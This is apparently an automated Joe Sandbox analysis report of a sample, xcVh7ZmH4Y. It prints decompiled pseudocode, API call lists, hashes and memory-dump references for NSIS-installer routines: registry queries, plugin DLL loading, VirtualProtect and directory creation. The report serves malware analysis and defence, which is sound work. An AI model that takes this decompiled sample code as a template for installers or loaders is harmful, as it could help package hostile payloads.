                                                0x004020d8
                                                0x004020dd
                                                0x004020e4
                                                0x004021a3
                                                0x004022f1
                                                0x004022f1
                                                0x00402c2a
                                                0x00402c2d
                                                0x00402c39
                                                0x00402c39
                                                0x004020f3
                                                0x004020fd
                                                0x00402100
                                                0x00402110
                                                0x00402114
                                                0x0040211a
                                                0x0040211c
                                                0x0040211f
                                                0x0040219c
                                                0x00000000
                                                0x0040219c
                                                0x00402121
                                                0x0040212c
                                                0x00402130
                                                0x00402170
                                                0x00402132
                                                0x00402135
                                                0x00402138
                                                0x00402164
                                                0x0040213a
                                                0x0040213d
                                                0x00402146
                                                0x00402148
                                                0x00402148
                                                0x00402146
                                                0x00402138
                                                0x00402178
                                                0x00402191
                                                0x00402191
                                                0x00000000
                                                0x00402178
                                                0x00402103
                                                0x0040210b
                                                0x0040210e
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00402103
                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll,00000000,?,76F1EA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll,00000000,?,76F1EA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                  • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll,00403418), ref: 004055FA
                                                  • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll), ref: 0040560C
                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                • String ID:
                                                • API String ID: 334405425-0
                                                • Opcode ID: 8fc0b63074c346d1d24f62ec551aba281f6c9b66b265cbc2eeb406f1c7e57b21
                                                • Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
                                                • Opcode Fuzzy Hash: 8fc0b63074c346d1d24f62ec551aba281f6c9b66b265cbc2eeb406f1c7e57b21
                                                • Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 58%
                                                			E00401B9B(void* __ebx) {
                                                				intOrPtr _t8;
                                                				void* _t9;
                                                				void* _t14;
                                                				void* _t30;
                                                				char* _t32;
                                                				void* _t33;
                                                				void* _t34;
                                                				void* _t37;
                                                
                                                				_t28 = __ebx;
                                                				_t8 =  *((intOrPtr*)(_t37 - 0x28));
                                                				_t33 =  *0x40ce50;
                                                				if(_t8 == __ebx) {
                                                					if( *((intOrPtr*)(_t37 - 0x2c)) == __ebx) {
                                                						_t9 = GlobalAlloc(0x40, 0x804); // executed
                                                						_t34 = _t9;
                                                						_t5 = _t34 + 4; // 0x4
                                                						E0040657A(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x30)));
                                                						 *_t34 =  *0x40ce50;
                                                						 *0x40ce50 = _t34;
                                                					} else {
                                                						if(_t33 == __ebx) {
                                                							 *((intOrPtr*)(_t37 - 4)) = 1;
                                                						} else {
                                                							E0040653D(_t30, _t33 + 4);
                                                							_push(_t33);
                                                							 *0x40ce50 =  *_t33;
                                                							GlobalFree();
                                                						}
                                                					}
                                                					goto L15;
                                                				} else {
                                                					while(1) {
                                                						_t8 = _t8 - 1;
                                                						if(_t33 == _t28) {
                                                							break;
                                                						}
                                                						_t33 =  *_t33;
                                                						if(_t8 != _t28) {
                                                							continue;
                                                						} else {
                                                							if(_t33 == _t28) {
                                                								break;
                                                							} else {
                                                								_t36 = _t33 + 4;
                                                								_t32 = L"Call";
                                                								E0040653D(_t32, _t33 + 4);
                                                								E0040653D(_t36,  *0x40ce50 + 4);
                                                								_push(_t32);
                                                								_push( *0x40ce50 + 4);
                                                								E0040653D();
                                                								L15:
                                                								 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t37 - 4));
                                                								_t14 = 0;
                                                							}
                                                						}
                                                						goto L17;
                                                					}
                                                					_push(0x200010);
                                                					_push(E0040657A(_t28, _t30, _t33, _t28, 0xffffffe8));
                                                					E00405B9D();
                                                					_t14 = 0x7fffffff;
                                                				}
                                                				L17:
                                                				return _t14;
                                                			}











                                                0x00401b9b
                                                0x00401b9b
                                                0x00401b9e
                                                0x00401ba6
                                                0x00401bef
                                                0x00401c1d
                                                0x00401c26
                                                0x00401c28
                                                0x00401c2c
                                                0x00401c36
                                                0x00401c38
                                                0x00401bf1
                                                0x00401bf3
                                                0x0040292e
                                                0x00401bf9
                                                0x00401bfe
                                                0x00401c05
                                                0x00401c06
                                                0x00401c0b
                                                0x00401c0b
                                                0x00401bf3
                                                0x00000000
                                                0x00401ba8
                                                0x00401ba8
                                                0x00401ba8
                                                0x00401bab
                                                0x00000000
                                                0x00000000
                                                0x00401bb1
                                                0x00401bb5
                                                0x00000000
                                                0x00401bb7
                                                0x00401bb9
                                                0x00000000
                                                0x00401bbf
                                                0x00401bbf
                                                0x00401bc2
                                                0x00401bc9
                                                0x00401bd8
                                                0x00401be2
                                                0x00401be6
                                                0x00402a94
                                                0x00402c2a
                                                0x00402c2d
                                                0x00402c33
                                                0x00402c33
                                                0x00401bb9
                                                0x00000000
                                                0x00401bb5
                                                0x0040238a
                                                0x00402397
                                                0x00402398
                                                0x0040239d
                                                0x0040239d
                                                0x00402c35
                                                0x00402c39

                                                APIs
                                                • GlobalFree.KERNEL32 ref: 00401C0B
                                                • GlobalAlloc.KERNEL32(00000040,00000804), ref: 00401C1D
                                                  • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll,00000000), ref: 00406779
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: Global$AllocFreelstrcatlstrlen
                                                • String ID: Call
                                                • API String ID: 3292104215-1824292864
                                                • Opcode ID: 52fc7f4bba199dd755adce2563ca841cd078fe1cbc178577cb316ce9b26f1339
                                                • Instruction ID: 7c0f58a685d1fc6dd3685da305ee1819882fb4420ac17dc2787245939102450a
                                                • Opcode Fuzzy Hash: 52fc7f4bba199dd755adce2563ca841cd078fe1cbc178577cb316ce9b26f1339
                                                • Instruction Fuzzy Hash: 1B21D872904210EBDB20AFA8EE84A5E73B4EB04715755063BF552F72D0D7B8AC414B9D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E0040259E(int* __ebx, intOrPtr __edx, short* __edi) {
                                                				void* _t9;
                                                				int _t10;
                                                				long _t13;
                                                				int* _t16;
                                                				intOrPtr _t21;
                                                				short* _t22;
                                                				void* _t24;
                                                				void* _t26;
                                                				void* _t29;
                                                
                                                				_t22 = __edi;
                                                				_t21 = __edx;
                                                				_t16 = __ebx;
                                                				_t9 = E00402DE6(_t29, 0x20019); // executed
                                                				_t24 = _t9;
                                                				_t10 = E00402D84(3);
                                                				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
                                                				 *__edi = __ebx;
                                                				if(_t24 == __ebx) {
                                                					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                				} else {
                                                					 *(_t26 + 8) = 0x3ff;
                                                					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
                                                						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
                                                						__eflags = _t13;
                                                						if(_t13 != 0) {
                                                							 *((intOrPtr*)(_t26 - 4)) = 1;
                                                						}
                                                					} else {
                                                						RegEnumKeyW(_t24, _t10, __edi, 0x3ff); // executed
                                                					}
                                                					_t22[0x3ff] = _t16;
                                                					_push(_t24);
                                                					RegCloseKey();
                                                				}
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t26 - 4));
                                                				return 0;
                                                			}












                                                0x0040259e
                                                0x0040259e
                                                0x0040259e
                                                0x004025a3
                                                0x004025aa
                                                0x004025ac
                                                0x004025b4
                                                0x004025b7
                                                0x004025ba
                                                0x0040292e
                                                0x004025c0
                                                0x004025c8
                                                0x004025cb
                                                0x004025e4
                                                0x004025ea
                                                0x004025ec
                                                0x004025ee
                                                0x004025ee
                                                0x004025cd
                                                0x004025d1
                                                0x004025d1
                                                0x004025f5
                                                0x004025fc
                                                0x004025fd
                                                0x004025fd
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                • RegEnumValueW.ADVAPI32 ref: 004025E4
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nss732B.tmp,00000000,00000011,00000002), ref: 004025FD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: Enum$CloseValue
                                                • String ID:
                                                • API String ID: 397863658-0
                                                • Opcode ID: eb877c1892a8007c8d5756c2053a66096deea000915ae606c9df5557c0642565
                                                • Instruction ID: 08080f496e1fbaad801da7c4a2f11cdf7a22a5a493a276a89d416976773fa01e
                                                • Opcode Fuzzy Hash: eb877c1892a8007c8d5756c2053a66096deea000915ae606c9df5557c0642565
                                                • Instruction Fuzzy Hash: 89017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61C0EBB85E44966D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                
                                                				 *0x73545048 = _a4;
                                                				if(_a8 == 1) {
                                                					VirtualProtect(0x7354505c, 4, 0x40, 0x7354504c); // executed
                                                					 *0x7354505c = 0xc2;
                                                					 *0x7354504c = 0;
                                                					 *0x73545054 = 0;
                                                					 *0x73545068 = 0;
                                                					 *0x73545058 = 0;
                                                					 *0x73545050 = 0;
                                                					 *0x73545060 = 0;
                                                					 *0x7354505e = 0;
                                                				}
                                                				return 1;
                                                			}



                                                0x73542a88
                                                0x73542a8d
                                                0x73542a9d
                                                0x73542aa5
                                                0x73542aac
                                                0x73542ab1
                                                0x73542ab6
                                                0x73542abb
                                                0x73542ac0
                                                0x73542ac5
                                                0x73542aca
                                                0x73542aca
                                                0x73542ad2

                                                APIs
                                                • VirtualProtect.KERNEL32(7354505C,00000004,00000040,7354504C), ref: 73542A9D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.896849351.0000000073541000.00000020.00000001.01000000.00000004.sdmp, Offset: 73540000, based on PE: true
                                                • Associated: 00000000.00000002.896815263.0000000073540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.896857446.0000000073544000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.896866612.0000000073546000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_73540000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID: `gv@Mv
                                                • API String ID: 544645111-3191811104
                                                • Opcode ID: ff36a22e4dc9bc6fe2306b803d657cf831f2e5443e7bbd457d60fa59ac15d06d
                                                • Instruction ID: 4d35eb4812a8e606d5fb1a80a53c73f0b2eba20a425fec1391cd8eacda7df1b8
                                                • Opcode Fuzzy Hash: ff36a22e4dc9bc6fe2306b803d657cf831f2e5443e7bbd457d60fa59ac15d06d
                                                • Instruction Fuzzy Hash: 8CF0A5FA540288DEC369EF2B8444F093BE0BB09304B244E2AED9CDA241E374404ADF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E004015C1(short __ebx, void* __eflags) {
                                                				void* _t17;
                                                				int _t23;
                                                				void* _t25;
                                                				signed char _t26;
                                                				short _t28;
                                                				short _t31;
                                                				short* _t34;
                                                				void* _t36;
                                                
                                                				_t28 = __ebx;
                                                				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                				_t17 = E00405EB7(_t16);
                                                				_t32 = _t17;
                                                				if(_t17 != __ebx) {
                                                					do {
                                                						_t34 = E00405E39(_t32, 0x5c);
                                                						_t31 =  *_t34;
                                                						 *_t34 = _t28;
                                                						if(_t31 != _t28) {
                                                							L5:
                                                							_t25 = E00405AEB( *(_t36 + 8));
                                                						} else {
                                                							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
                                                								goto L5;
                                                							} else {
                                                								_t25 = E00405A6E( *(_t36 + 8)); // executed
                                                							}
                                                						}
                                                						if(_t25 != _t28) {
                                                							if(_t25 != 0xb7) {
                                                								L9:
                                                								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                							} else {
                                                								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                								if((_t26 & 0x00000010) == 0) {
                                                									goto L9;
                                                								}
                                                							}
                                                						}
                                                						 *_t34 = _t31;
                                                						_t32 = _t34 + 2;
                                                					} while (_t31 != _t28);
                                                				}
                                                				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                					_push(0xfffffff5);
                                                					E00401423();
                                                				} else {
                                                					E00401423(0xffffffe6);
                                                					E0040653D(0x441000,  *(_t36 + 8));
                                                					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                					if(_t23 == 0) {
                                                						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                					}
                                                				}
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
                                                				return 0;
                                                			}











                                                0x004015c1
                                                0x004015c9
                                                0x004015cc
                                                0x004015d1
                                                0x004015d5
                                                0x004015d7
                                                0x004015df
                                                0x004015e1
                                                0x004015e4
                                                0x004015ea
                                                0x00401604
                                                0x00401607
                                                0x004015ec
                                                0x004015ec
                                                0x004015ef
                                                0x00000000
                                                0x004015fa
                                                0x004015fd
                                                0x004015fd
                                                0x004015ef
                                                0x0040160e
                                                0x00401615
                                                0x00401624
                                                0x00401624
                                                0x00401617
                                                0x0040161a
                                                0x00401622
                                                0x00000000
                                                0x00000000
                                                0x00401622
                                                0x00401615
                                                0x00401627
                                                0x0040162b
                                                0x0040162c
                                                0x004015d7
                                                0x00401634
                                                0x00401663
                                                0x004022f1
                                                0x00401636
                                                0x00401638
                                                0x00401645
                                                0x0040164d
                                                0x00401655
                                                0x0040165b
                                                0x0040165b
                                                0x00401655
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                  • Part of subcall function 00405EB7: CharNextW.USER32(?,?,C:\,?,00405F2B,C:\,C:\,76F1FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                  • Part of subcall function 00405A6E: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                • SetCurrentDirectoryW.KERNEL32(?,00441000,?,00000000,000000F0), ref: 0040164D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                • String ID:
                                                • API String ID: 1892508949-0
                                                • Opcode ID: b33db422fb51fa5ecbdb099e32eb378baf88cce1f79279cf93775203c76b05d0
                                                • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                                                • Opcode Fuzzy Hash: b33db422fb51fa5ecbdb099e32eb378baf88cce1f79279cf93775203c76b05d0
                                                • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 84%
                                                			E0040252A(int* __ebx, char* __edi) {
                                                				void* _t17;
                                                				short* _t18;
                                                				void* _t35;
                                                				void* _t37;
                                                				void* _t40;
                                                
                                                				_t33 = __edi;
                                                				_t27 = __ebx;
                                                				_t17 = E00402DE6(_t40, 0x20019); // executed
                                                				_t35 = _t17;
                                                				_t18 = E00402DA6(0x33);
                                                				 *__edi = __ebx;
                                                				if(_t35 == __ebx) {
                                                					 *(_t37 - 4) = 1;
                                                				} else {
                                                					 *(_t37 - 0x10) = 0x800;
                                                					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
                                                						L7:
                                                						 *_t33 = _t27;
                                                						 *(_t37 - 4) = 1;
                                                					} else {
                                                						if( *(_t37 + 8) == 4) {
                                                							__eflags =  *(_t37 - 0x20) - __ebx;
                                                							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
                                                							E00406484(__edi,  *__edi);
                                                						} else {
                                                							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                								 *(_t37 - 4) =  *(_t37 - 0x20);
                                                								_t33[0x7fe] = _t27;
                                                							} else {
                                                								goto L7;
                                                							}
                                                						}
                                                					}
                                                					_push(_t35);
                                                					RegCloseKey();
                                                				}
                                                				 *0x434f88 =  *0x434f88 +  *(_t37 - 4);
                                                				return 0;
                                                			}








                                                0x0040252a
                                                0x0040252a
                                                0x0040252f
                                                0x00402536
                                                0x00402538
                                                0x0040253f
                                                0x00402542
                                                0x0040292e
                                                0x00402548
                                                0x0040254b
                                                0x00402566
                                                0x00402596
                                                0x00402596
                                                0x00402599
                                                0x00402568
                                                0x0040256c
                                                0x00402585
                                                0x0040258c
                                                0x0040258f
                                                0x0040256e
                                                0x00402571
                                                0x0040257c
                                                0x004025f5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402571
                                                0x0040256c
                                                0x004025fc
                                                0x004025fd
                                                0x004025fd
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nss732B.tmp,00000000,00000011,00000002), ref: 004025FD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue
                                                • String ID:
                                                • API String ID: 3356406503-0
                                                • Opcode ID: 43fb8dda78ad99cc5dd4f22d664c311adf40e2f39c05d722184b5c87af473be2
                                                • Instruction ID: 3e5dab0bbcc9b7b4348569693e39c51bc0b27c59e8ea0ed6abb05ebc10b9b344
                                                • Opcode Fuzzy Hash: 43fb8dda78ad99cc5dd4f22d664c311adf40e2f39c05d722184b5c87af473be2
                                                • Instruction Fuzzy Hash: 5F116D71900219EADF14DFA4DA589AE77B4FF04345B20443BE401B62C0E7B88A45EB5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 69%
                                                			E00401389(signed int _a4) {
                                                				intOrPtr* _t6;
                                                				void* _t8;
                                                				void* _t10;
                                                				signed int _t11;
                                                				void* _t12;
                                                				signed int _t16;
                                                				signed int _t17;
                                                				void* _t18;
                                                
                                                				_t17 = _a4;
                                                				while(_t17 >= 0) {
                                                					_t6 = _t17 * 0x1c +  *0x434f30;
                                                					if( *_t6 == 1) {
                                                						break;
                                                					}
                                                					_push(_t6); // executed
                                                					_t8 = E00401434(); // executed
                                                					if(_t8 == 0x7fffffff) {
                                                						return 0x7fffffff;
                                                					}
                                                					_t10 = E0040136D(_t8);
                                                					if(_t10 != 0) {
                                                						_t11 = _t10 - 1;
                                                						_t16 = _t17;
                                                						_t17 = _t11;
                                                						_t12 = _t11 - _t16;
                                                					} else {
                                                						_t12 = _t10 + 1;
                                                						_t17 = _t17 + 1;
                                                					}
                                                					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                						 *0x433eec =  *0x433eec + _t12;
                                                						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0); // executed
                                                					}
                                                				}
                                                				return 0;
                                                			}











                                                0x0040138a
                                                0x004013fa
                                                0x0040139b
                                                0x004013a0
                                                0x00000000
                                                0x00000000
                                                0x004013a2
                                                0x004013a3
                                                0x004013ad
                                                0x00000000
                                                0x00401404
                                                0x004013b0
                                                0x004013b7
                                                0x004013bd
                                                0x004013be
                                                0x004013c0
                                                0x004013c2
                                                0x004013b9
                                                0x004013b9
                                                0x004013ba
                                                0x004013ba
                                                0x004013c9
                                                0x004013cb
                                                0x004013f4
                                                0x004013f4
                                                0x004013c9
                                                0x00000000

                                                APIs
                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
